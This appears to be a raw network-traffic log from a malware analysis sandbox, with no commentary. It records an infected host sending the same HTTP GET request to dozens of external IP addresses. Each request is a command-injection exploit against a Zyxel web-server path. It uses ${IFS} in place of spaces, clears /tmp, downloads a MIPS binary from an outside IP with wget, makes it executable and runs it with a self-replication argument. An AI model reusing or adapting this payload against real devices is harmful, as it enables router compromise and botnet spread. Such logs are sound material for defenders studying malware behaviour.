                                                Jan 12, 2024 18:16:32.677968979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6836192.168.2.235778657.8.244.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678024054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6837192.168.2.2338882202.6.246.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678095102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6838192.168.2.2334970210.216.125.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678180933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6839192.168.2.2341948176.175.157.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678220034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6840192.168.2.236066240.198.89.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678277016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6841192.168.2.2338762198.103.205.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678303003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6842192.168.2.2344744142.149.4.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678332090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6843192.168.2.233306280.112.33.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678404093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6844192.168.2.23595025.202.129.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678487062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6845192.168.2.2359178151.119.87.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678539038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6846192.168.2.2339594120.246.20.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678575993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6847192.168.2.236093039.253.83.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678658962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6848192.168.2.2357248186.57.67.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678695917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6849192.168.2.234384868.165.140.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678770065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6850192.168.2.2336002108.226.74.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678818941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6851192.168.2.2340406201.192.21.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678885937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6852192.168.2.23492882.82.189.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678924084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6853192.168.2.2360430120.136.11.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.678991079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6854192.168.2.2355410210.110.31.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679033041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6855192.168.2.233449859.10.111.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679102898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6856192.168.2.234256695.23.186.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679150105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6857192.168.2.233739878.83.189.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679205894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6858192.168.2.2333248181.123.76.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679265022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6859192.168.2.235346274.195.92.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679302931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6860192.168.2.235951889.167.27.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679349899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6861192.168.2.235254452.222.85.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679374933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6862192.168.2.2334914201.242.2.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679406881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6863192.168.2.2349166206.83.131.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679482937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6864192.168.2.2355038164.44.237.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679547071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6865192.168.2.2335902191.38.10.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679594994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6866192.168.2.2334816119.88.239.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679645061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6867192.168.2.2336492161.16.192.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679685116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6868192.168.2.2334002150.16.15.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679740906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6869192.168.2.2357662135.118.219.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679826975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6870192.168.2.234451846.6.5.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679858923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6871192.168.2.2344218136.233.67.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679893017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6872192.168.2.234908869.193.83.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.679955006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6873192.168.2.234976678.70.114.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680021048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6874192.168.2.2360612125.136.142.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680068970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6875192.168.2.234199260.157.53.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680128098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6876192.168.2.235125447.204.253.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680183887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6877192.168.2.234472852.195.248.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680241108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6878192.168.2.233750442.245.127.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680315971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6879192.168.2.236083841.190.249.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680382967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6880192.168.2.2360450148.71.101.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680428982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6881192.168.2.235735065.123.80.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680500984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6882192.168.2.235954467.43.87.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680576086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6883192.168.2.2360960131.207.207.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680628061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6884192.168.2.2335938187.61.242.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680668116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6885192.168.2.2358630169.144.143.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680732965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6886192.168.2.233575696.75.140.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680819988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6887192.168.2.2356192180.89.193.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680876017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6888192.168.2.2347840180.113.15.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680933952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6889192.168.2.2356078115.21.60.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.680984020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6890192.168.2.2333830154.147.11.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681013107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6891192.168.2.2359530141.181.38.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681051016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6892192.168.2.234648894.174.169.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681138992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6893192.168.2.2348602152.164.161.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681193113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6894192.168.2.2356300219.235.145.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681245089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6895192.168.2.233600247.230.47.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681271076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6896192.168.2.233401017.22.157.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681350946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6897192.168.2.2359050180.201.156.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:32.681397915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6898192.168.2.2344396167.237.52.214443
                                                TimestampBytes transferredDirectionData
